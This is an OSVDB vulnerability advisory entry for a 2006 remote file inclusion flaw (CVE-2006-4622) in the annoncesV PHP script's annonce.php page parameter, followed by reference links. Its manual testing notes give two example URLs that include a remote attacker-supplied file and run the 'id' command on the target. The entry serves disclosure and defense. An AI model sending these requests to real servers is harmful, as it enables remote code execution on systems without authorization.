annoncesV annonce.php page Variable Remote File Inclusion

2006-09-05T05:48:53
ID OSVDB:28568
Type osvdb
Reporter OSVDB
Modified 2006-09-05T05:48:53

Description

Manual Testing Notes

http://[target]/annonce.php?page=yourcode.txt?&cmd=id http://[target]/admin/annonce.php?page=yourcode.txt?&cmd=id

References:

Vendor URL: http://www.comscripts.com/scripts/php.annoncesv.1895.html Secunia Advisory ID:21772 Other Advisory URL: http://kurdishsecurity.blogspot.com/2006/09/kurdish-security-26-annoncev-news.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-09/0041.html Keyword: Kurdish Security #26 FrSIRT Advisory: ADV-2006-3470 CVE-2006-4622 Bugtraq ID: 19854